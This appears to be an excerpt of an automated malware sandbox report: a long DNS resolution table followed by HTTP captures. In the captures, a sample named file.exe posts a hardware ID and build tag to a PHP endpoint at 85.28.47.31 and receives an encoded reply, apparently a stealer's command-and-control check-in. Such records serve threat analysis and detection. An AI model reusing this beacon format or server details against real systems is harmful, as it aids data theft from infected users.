Jul 26, 2024 20:10:48.863549948 CEST	1.1.1.1	192.168.2.5	0x1ce8	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.863569975 CEST	1.1.1.1	192.168.2.5	0xe879	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:48.864520073 CEST	1.1.1.1	192.168.2.5	0xe85d	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.623368979 CEST	1.1.1.1	192.168.2.5	0x9269	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:49.623368979 CEST	1.1.1.1	192.168.2.5	0x9269	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.638910055 CEST	1.1.1.1	192.168.2.5	0xec4d	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:49.638922930 CEST	1.1.1.1	192.168.2.5	0xd880	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:50.367173910 CEST	1.1.1.1	192.168.2.5	0xc1b3	No error (0)	r10.o.lencr.org	o.lencr.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:50.523283958 CEST	1.1.1.1	192.168.2.5	0xff52	No error (0)	r3.o.lencr.org	o.lencr.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:50.938530922 CEST	1.1.1.1	192.168.2.5	0xc37d	No error (0)	getpocket.cdn.mozilla.net	getpocket-cdn.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:50.938530922 CEST	1.1.1.1	192.168.2.5	0xc37d	No error (0)	prod.pocket.prod.cloudops.mozgcp.net		34.120.5.221	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.938623905 CEST	1.1.1.1	192.168.2.5	0xc37d	No error (0)	getpocket.cdn.mozilla.net	getpocket-cdn.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:50.938623905 CEST	1.1.1.1	192.168.2.5	0xc37d	No error (0)	prod.pocket.prod.cloudops.mozgcp.net		34.120.5.221	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.950906992 CEST	1.1.1.1	192.168.2.5	0xae2	No error (0)	prod.pocket.prod.cloudops.mozgcp.net		34.120.5.221	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:50.961457014 CEST	1.1.1.1	192.168.2.5	0x83df	No error (0)	prod.pocket.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:10:53.449642897 CEST	1.1.1.1	192.168.2.5	0xb5fc	No error (0)	r11.o.lencr.org	o.lencr.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:53.488034010 CEST	1.1.1.1	192.168.2.5	0x2140	No error (0)	firefox-api-proxy.cdn.mozilla.net	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:53.488034010 CEST	1.1.1.1	192.168.2.5	0x2140	No error (0)	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net		34.149.97.1	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:53.518703938 CEST	1.1.1.1	192.168.2.5	0x3f38	No error (0)	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net		34.149.97.1	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:53.526496887 CEST	1.1.1.1	192.168.2.5	0x8354	No error (0)	firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:10:54.328999996 CEST	1.1.1.1	192.168.2.5	0xb744	No error (0)	push.services.mozilla.com	autopush.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:55.538772106 CEST	1.1.1.1	192.168.2.5	0x998d	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:55.538790941 CEST	1.1.1.1	192.168.2.5	0x998d	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:55.550597906 CEST	1.1.1.1	192.168.2.5	0x8602	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:10:59.826756001 CEST	1.1.1.1	192.168.2.5	0x4068	No error (0)	r11.o.lencr.org	o.lencr.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:10:59.901645899 CEST	1.1.1.1	192.168.2.5	0xbca1	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.082581997 CEST	1.1.1.1	192.168.2.5	0xe10e	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:00.082581997 CEST	1.1.1.1	192.168.2.5	0xe10e	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.228467941 CEST	1.1.1.1	192.168.2.5	0x8ab	No error (0)	services.addons.mozilla.org		18.65.39.112	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.228467941 CEST	1.1.1.1	192.168.2.5	0x8ab	No error (0)	services.addons.mozilla.org		18.65.39.4	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.228467941 CEST	1.1.1.1	192.168.2.5	0x8ab	No error (0)	services.addons.mozilla.org		18.65.39.85	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.228467941 CEST	1.1.1.1	192.168.2.5	0x8ab	No error (0)	services.addons.mozilla.org		18.65.39.31	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.248631954 CEST	1.1.1.1	192.168.2.5	0x549c	No error (0)	services.addons.mozilla.org		18.65.39.31	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.248631954 CEST	1.1.1.1	192.168.2.5	0x549c	No error (0)	services.addons.mozilla.org		18.65.39.4	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.248631954 CEST	1.1.1.1	192.168.2.5	0x549c	No error (0)	services.addons.mozilla.org		18.65.39.85	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:00.248631954 CEST	1.1.1.1	192.168.2.5	0x549c	No error (0)	services.addons.mozilla.org		18.65.39.112	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.280464888 CEST	1.1.1.1	192.168.2.5	0x7a0b	No error (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net		34.36.165.17	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.303185940 CEST	1.1.1.1	192.168.2.5	0x17e9	No error (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net		34.36.165.17	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.321938992 CEST	1.1.1.1	192.168.2.5	0xdcc3	No error (0)	tiles-cdn.prod.ads.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:01.337488890 CEST	1.1.1.1	192.168.2.5	0x1365	No error (0)	img-getpocket.cdn.mozilla.net	img-getpocket-cdn.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:01.337488890 CEST	1.1.1.1	192.168.2.5	0x1365	No error (0)	img-prod.pocket.prod.cloudops.mozgcp.net		34.120.237.76	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.354624987 CEST	1.1.1.1	192.168.2.5	0xcf08	No error (0)	img-prod.pocket.prod.cloudops.mozgcp.net		34.120.237.76	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:01.363723993 CEST	1.1.1.1	192.168.2.5	0xc815	No error (0)	img-prod.pocket.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:02.401819944 CEST	1.1.1.1	192.168.2.5	0x34f4	No error (0)	firefox-settings-attachments.cdn.mozilla.net	attachments.prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:02.401819944 CEST	1.1.1.1	192.168.2.5	0x34f4	No error (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net		34.117.121.53	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.445949078 CEST	1.1.1.1	192.168.2.5	0xeb14	No error (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net		34.117.121.53	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.481969118 CEST	1.1.1.1	192.168.2.5	0xeb14	No error (0)	attachments.prod.remote-settings.prod.webservices.mozgcp.net		34.117.121.53	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:02.840362072 CEST	1.1.1.1	192.168.2.5	0x8460	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:02.840362072 CEST	1.1.1.1	192.168.2.5	0x8460	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278392076 CEST	1.1.1.1	192.168.2.5	0xc9e	No error (0)	www.expedia.com	www.expedia.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278732061 CEST	1.1.1.1	192.168.2.5	0x2d49	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278732061 CEST	1.1.1.1	192.168.2.5	0x2d49	No error (0)	star-mini.c10r.facebook.com		157.240.252.35	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278832912 CEST	1.1.1.1	192.168.2.5	0xff7b	No error (0)	www.amazon.com	tp.47cf2c8c9-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278832912 CEST	1.1.1.1	192.168.2.5	0xff7b	No error (0)	tp.47cf2c8c9-frontier.amazon.com	d3ag4hukkh62yn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.278832912 CEST	1.1.1.1	192.168.2.5	0xff7b	No error (0)	d3ag4hukkh62yn.cloudfront.net		99.86.2.175	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.286187887 CEST	1.1.1.1	192.168.2.5	0x937c	No error (0)	star-mini.c10r.facebook.com		157.240.0.35	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.287045956 CEST	1.1.1.1	192.168.2.5	0x9e83	No error (0)	d3ag4hukkh62yn.cloudfront.net		13.224.242.232	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.294553041 CEST	1.1.1.1	192.168.2.5	0xa054	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.297210932 CEST	1.1.1.1	192.168.2.5	0x5a9a	No error (0)	d3ag4hukkh62yn.cloudfront.net			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.301942110 CEST	1.1.1.1	192.168.2.5	0x1827	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.301942110 CEST	1.1.1.1	192.168.2.5	0x1827	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.301942110 CEST	1.1.1.1	192.168.2.5	0x1827	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.301942110 CEST	1.1.1.1	192.168.2.5	0x1827	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.301942110 CEST	1.1.1.1	192.168.2.5	0x1827	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.305572987 CEST	1.1.1.1	192.168.2.5	0x71e7	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 20:11:03.305572987 CEST	1.1.1.1	192.168.2.5	0x71e7	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.306788921 CEST	1.1.1.1	192.168.2.5	0xb779	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.310578108 CEST	1.1.1.1	192.168.2.5	0x3da2	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.310578108 CEST	1.1.1.1	192.168.2.5	0x3da2	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.310578108 CEST	1.1.1.1	192.168.2.5	0x3da2	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.310578108 CEST	1.1.1.1	192.168.2.5	0x3da2	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.313656092 CEST	1.1.1.1	192.168.2.5	0x3d06	No error (0)	dyna.wikimedia.org		185.15.59.224	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.314925909 CEST	1.1.1.1	192.168.2.5	0x2e71	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.321702003 CEST	1.1.1.1	192.168.2.5	0x4138	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.328732967 CEST	1.1.1.1	192.168.2.5	0x4f3a	No error (0)	getpocket.com		143.204.98.129	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.328732967 CEST	1.1.1.1	192.168.2.5	0x4f3a	No error (0)	getpocket.com		143.204.98.79	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.328732967 CEST	1.1.1.1	192.168.2.5	0x4f3a	No error (0)	getpocket.com		143.204.98.120	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.328732967 CEST	1.1.1.1	192.168.2.5	0x4f3a	No error (0)	getpocket.com		143.204.98.100	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.334527969 CEST	1.1.1.1	192.168.2.5	0xb32c	No error (0)	market-trk.com		104.18.12.104	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.334527969 CEST	1.1.1.1	192.168.2.5	0xb32c	No error (0)	market-trk.com		104.18.13.104	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.338339090 CEST	1.1.1.1	192.168.2.5	0x5a9e	No error (0)	getpocket.com		143.204.68.89	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.338339090 CEST	1.1.1.1	192.168.2.5	0x5a9e	No error (0)	getpocket.com		143.204.68.24	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.338339090 CEST	1.1.1.1	192.168.2.5	0x5a9e	No error (0)	getpocket.com		143.204.68.110	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.338339090 CEST	1.1.1.1	192.168.2.5	0x5a9e	No error (0)	getpocket.com		143.204.68.6	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.341291904 CEST	1.1.1.1	192.168.2.5	0x2f35	No error (0)	www.mozorg.moz.works		18.239.17.158	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.347887993 CEST	1.1.1.1	192.168.2.5	0xa3f2	No error (0)	market-trk.com		104.18.13.104	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.347887993 CEST	1.1.1.1	192.168.2.5	0xa3f2	No error (0)	market-trk.com		104.18.12.104	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.351644039 CEST	1.1.1.1	192.168.2.5	0x99bb	No error (0)	www.mozorg.moz.works		3.164.208.153	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.355688095 CEST	1.1.1.1	192.168.2.5	0x1cbd	No error (0)	www.romper.com		143.204.98.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.355688095 CEST	1.1.1.1	192.168.2.5	0x1cbd	No error (0)	www.romper.com		143.204.98.36	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.355688095 CEST	1.1.1.1	192.168.2.5	0x1cbd	No error (0)	www.romper.com		143.204.98.94	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.355688095 CEST	1.1.1.1	192.168.2.5	0x1cbd	No error (0)	www.romper.com		143.204.98.117	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.360856056 CEST	1.1.1.1	192.168.2.5	0xa15d	No error (0)	market-trk.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.360856056 CEST	1.1.1.1	192.168.2.5	0xa15d	No error (0)	market-trk.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.373363018 CEST	1.1.1.1	192.168.2.5	0xc60b	No error (0)	www.themarshallproject.org		104.22.69.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.373363018 CEST	1.1.1.1	192.168.2.5	0xc60b	No error (0)	www.themarshallproject.org		104.22.68.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.373363018 CEST	1.1.1.1	192.168.2.5	0xc60b	No error (0)	www.themarshallproject.org		172.67.14.215	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.376701117 CEST	1.1.1.1	192.168.2.5	0xaf5e	No error (0)	www.romper.com		143.204.98.36	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.376701117 CEST	1.1.1.1	192.168.2.5	0xaf5e	No error (0)	www.romper.com		143.204.98.117	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.376701117 CEST	1.1.1.1	192.168.2.5	0xaf5e	No error (0)	www.romper.com		143.204.98.94	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.376701117 CEST	1.1.1.1	192.168.2.5	0xaf5e	No error (0)	www.romper.com		143.204.98.82	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.384848118 CEST	1.1.1.1	192.168.2.5	0x1f6e	No error (0)	www.wired.com		108.156.60.57	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.384848118 CEST	1.1.1.1	192.168.2.5	0x1f6e	No error (0)	www.wired.com		108.156.60.105	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.384848118 CEST	1.1.1.1	192.168.2.5	0x1f6e	No error (0)	www.wired.com		108.156.60.66	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.384848118 CEST	1.1.1.1	192.168.2.5	0x1f6e	No error (0)	www.wired.com		108.156.60.93	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.385348082 CEST	1.1.1.1	192.168.2.5	0xcb81	No error (0)	www.themarshallproject.org		104.22.69.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.385348082 CEST	1.1.1.1	192.168.2.5	0xcb81	No error (0)	www.themarshallproject.org		104.22.68.164	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.385348082 CEST	1.1.1.1	192.168.2.5	0xcb81	No error (0)	www.themarshallproject.org		172.67.14.215	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.396857977 CEST	1.1.1.1	192.168.2.5	0x619e	No error (0)	www.themarshallproject.org			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.396857977 CEST	1.1.1.1	192.168.2.5	0x619e	No error (0)	www.themarshallproject.org			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.396857977 CEST	1.1.1.1	192.168.2.5	0x619e	No error (0)	www.themarshallproject.org			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.397743940 CEST	1.1.1.1	192.168.2.5	0x6017	No error (0)	ww55.affinity.net		34.160.134.7	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.406805992 CEST	1.1.1.1	192.168.2.5	0x31f3	No error (0)	ww55.affinity.net		34.160.134.7	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.406927109 CEST	1.1.1.1	192.168.2.5	0x46af	No error (0)	www.wired.com		108.156.60.105	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.406927109 CEST	1.1.1.1	192.168.2.5	0x46af	No error (0)	www.wired.com		108.156.60.57	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.406927109 CEST	1.1.1.1	192.168.2.5	0x46af	No error (0)	www.wired.com		108.156.60.93	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.406927109 CEST	1.1.1.1	192.168.2.5	0x46af	No error (0)	www.wired.com		108.156.60.66	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:03.426592112 CEST	1.1.1.1	192.168.2.5	0x8865	No error (0)	www.wired.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:10.364739895 CEST	1.1.1.1	192.168.2.5	0xdb82	No error (0)	www.jezebel.com		172.67.13.9	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.364739895 CEST	1.1.1.1	192.168.2.5	0xdb82	No error (0)	www.jezebel.com		104.22.0.213	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.364739895 CEST	1.1.1.1	192.168.2.5	0xdb82	No error (0)	www.jezebel.com		104.22.1.213	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.372777939 CEST	1.1.1.1	192.168.2.5	0x8eb6	No error (0)	eat.hungryroot.com		159.89.133.227	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.373974085 CEST	1.1.1.1	192.168.2.5	0xd9d7	No error (0)	www.jezebel.com		172.67.13.9	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.373974085 CEST	1.1.1.1	192.168.2.5	0xd9d7	No error (0)	www.jezebel.com		104.22.1.213	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.373974085 CEST	1.1.1.1	192.168.2.5	0xd9d7	No error (0)	www.jezebel.com		104.22.0.213	A (IP address)	IN (0x0001)	false
Jul 26, 2024 20:11:10.382642031 CEST	1.1.1.1	192.168.2.5	0x862a	No error (0)	www.jezebel.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:10.382642031 CEST	1.1.1.1	192.168.2.5	0x862a	No error (0)	www.jezebel.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:10.382642031 CEST	1.1.1.1	192.168.2.5	0x862a	No error (0)	www.jezebel.com			28	IN (0x0001)	false
Jul 26, 2024 20:11:10.390362978 CEST	1.1.1.1	192.168.2.5	0x83c0	No error (0)	eat.hungryroot.com		159.89.133.227	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	85.28.47.31	80	3436	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:09:00.141221046 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:09:00.789741039 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:09:00.792881966 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"sila------AFHDAKJKFCFBGCBGDHCB--
Jul 26, 2024 20:09:01.592344046 CEST	407	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:09:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 57 59 32 4d 7a 55 31 5a 47 56 68 4e 57 4e 6d 5a 44 45 77 4f 54 55 79 4d 6a 56 6c 4e 44 67 7a 59 7a 59 77 4e 54 4a 6d 4d 7a 42 6b 4d 54 6c 6c 4e 6d 4a 68 59 6d 4d 31 59 57 52 6b 59 32 4d 33 4e 47 56 6c 59 57 49 78 5a 47 55 31 4d 57 56 69 59 6a 49 33 59 57 45 32 5a 6a 5a 6c 4e 54 46 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MWY2MzU1ZGVhNWNmZDEwOTUyMjVlNDgzYzYwNTJmMzBkMTllNmJhYmM1YWRkY2M3NGVlYWIxZGU1MWViYjI3YWE2ZjZlNTFmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
